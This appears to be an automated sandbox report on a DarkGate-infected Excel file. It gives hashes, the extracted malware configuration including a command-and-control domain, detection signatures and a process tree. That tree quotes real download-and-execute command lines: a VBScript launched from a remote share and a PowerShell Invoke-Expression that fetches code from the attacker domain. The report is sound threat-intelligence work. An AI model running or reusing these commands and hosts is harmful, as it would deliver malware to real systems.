Analysis
- max time kernel: 147s
- max time network: 156s
- platform: windows10-2004_x64
- resource: win10v2004-20240226-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 28/02/2024, 21:50
- Static task: static1
- Behavioral task: behavioral1
  - Sample: scan-28-02-24_2843.xlsx
  - Resource: win7-20240221-en
General
- Target: scan-28-02-24_2843.xlsx
- Size: 29KB
- MD5: 9c1ebbb1a85ed19d809b78267ed9ab73
- SHA1: dba2c5d28e61109fe42682c22d9cef0075f05283
- SHA256: 87ef4188917d7e4b3fc3b91a0b5a2634aeb71557e29239cb8b72a5d8369eaf76
- SHA512: b7be6a97176a63d75dcd6330035dad65ecf32992918a4d98f5876a4f9c471d4bced6535b4b621a471b99643e35684dad760a5da6393276e6684118a16859e171
- SSDEEP: 768:wnEQpllh7tAafroiianGoHoJ+yWWn0WhtSY:nQJh7Lro4ntD+0ASY
Malware Config
Extracted
- darkgate
- admin888
- cayennesxque.boo

Configuration values:
- anti_analysis: true
- anti_debug: false
- anti_vm: true
- c2_port: 80
- check_disk: true
- check_ram: false
- check_xeon: false
- crypter_au3: false
- crypter_dll: false
- crypter_raw_stub: false
- internal_mutex: ekoRFSqn
- minimum_disk: 50
- minimum_ram: 7000
- ping_interval: 6
- rootkit: false
- startup_persistence: true
- username: admin888
Signatures
- Detect DarkGate stealer (4 IoCs)
  resource | yara_rule
  - behavioral2/memory/1964-63-0x0000000005BC0000-0x0000000005F0F000-memory.dmp | family_darkgate_v6
  - behavioral2/memory/1964-64-0x0000000005BC0000-0x0000000005F0F000-memory.dmp | family_darkgate_v6
  - behavioral2/memory/4304-100-0x0000000005680000-0x00000000059CF000-memory.dmp | family_darkgate_v6
  - behavioral2/memory/4304-101-0x0000000005680000-0x00000000059CF000-memory.dmp | family_darkgate_v6
- Process spawned unexpected child process (2 IoCs)
  This typically indicates the parent process was compromised via an exploit or macro.
  description | pid | pid_target | Process | procid_target
  - Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 2904 | 1584 | WScript.exe | 27
  - Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 5028 | 1584 | WScript.exe | 27
- Blocklisted process makes network request (8 IoCs)
  flow | pid | Process
  - 41 | 4232 | powershell.exe
  - 42 | 4232 | powershell.exe
  - 44 | 4232 | powershell.exe
  - 45 | 4232 | powershell.exe
  - 59 | 760 | powershell.exe
  - 60 | 760 | powershell.exe
  - 61 | 760 | powershell.exe
  - 62 | 760 | powershell.exe
- Downloads MZ/PE file
- Checks computer location settings (2 TTPs, 2 IoCs)
  Looks up the country code configured in the registry, likely a geofence.
  description | ioc | Process
  - Key value queried | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\Control Panel\International\Geo\Nation | WScript.exe
  - Key value queried | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\Control Panel\International\Geo\Nation | WScript.exe
- Executes dropped EXE (2 IoCs)
  pid | Process
  - 1964 | AutoIt3.exe
  - 4304 | AutoIt3.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Checks processor information in registry (2 TTPs, 7 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  description | ioc | Process
  - Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | EXCEL.EXE
  - Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | EXCEL.EXE
  - Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | AutoIt3.exe
  - Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | AutoIt3.exe
  - Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | AutoIt3.exe
  - Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | AutoIt3.exe
  - Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | EXCEL.EXE
- Enumerates system info in registry (2 TTPs, 3 IoCs)
  description | ioc | Process
  - Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | EXCEL.EXE
  - Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | EXCEL.EXE
  - Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | EXCEL.EXE
- Suspicious behavior: AddClipboardFormatListener (1 IoC)
  pid | Process
  - 1584 | EXCEL.EXE
- Suspicious behavior: EnumeratesProcesses (6 IoCs)
  pid | Process
  - 4232 | powershell.exe (3 entries)
  - 760 | powershell.exe (3 entries)
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  description | pid | Process
  - Token: SeDebugPrivilege | 4232 | powershell.exe
  - Token: SeDebugPrivilege | 760 | powershell.exe
- Suspicious use of SetWindowsHookEx (13 IoCs)
  pid | Process
  - 1584 | EXCEL.EXE (all 13 entries)
- Suspicious use of WriteProcessMemory (14 IoCs)
  description | pid | Process | procid_target
  - PID 1584 wrote to memory of 2904 | 1584 | EXCEL.EXE | 95 (2 entries)
  - PID 2904 wrote to memory of 4232 | 2904 | WScript.exe | 96 (2 entries)
  - PID 4232 wrote to memory of 1964 | 4232 | powershell.exe | 98 (3 entries)
  - PID 1584 wrote to memory of 5028 | 1584 | EXCEL.EXE | 100 (2 entries)
  - PID 5028 wrote to memory of 760 | 5028 | WScript.exe | 101 (2 entries)
  - PID 760 wrote to memory of 4304 | 760 | powershell.exe | 103 (3 entries)
Processes
- "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\scan-28-02-24_2843.xlsx" (PID 1584)
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - "C:\Windows\System32\WScript.exe" "\\147.45.197.186\share\scan.vbs" (PID 2904)
    - Process spawned unexpected child process
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    - "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri 'cayennesxque.boo/qdfjfvph') (PID 4232)
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      - "C:\temp\AutoIt3.exe" script.a3x (PID 1964)
        - Executes dropped EXE
        - Checks processor information in registry
  - "C:\Windows\System32\WScript.exe" "\\147.45.197.186\share\scan.vbs" (PID 5028)
    - Process spawned unexpected child process
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    - "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri 'cayennesxque.boo/qdfjfvph') (PID 760)
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      - "C:\temp\AutoIt3.exe" script.a3x (PID 4304)
        - Executes dropped EXE
        - Checks processor information in registry
Network
MITRE ATT&CK Enterprise v15
Downloads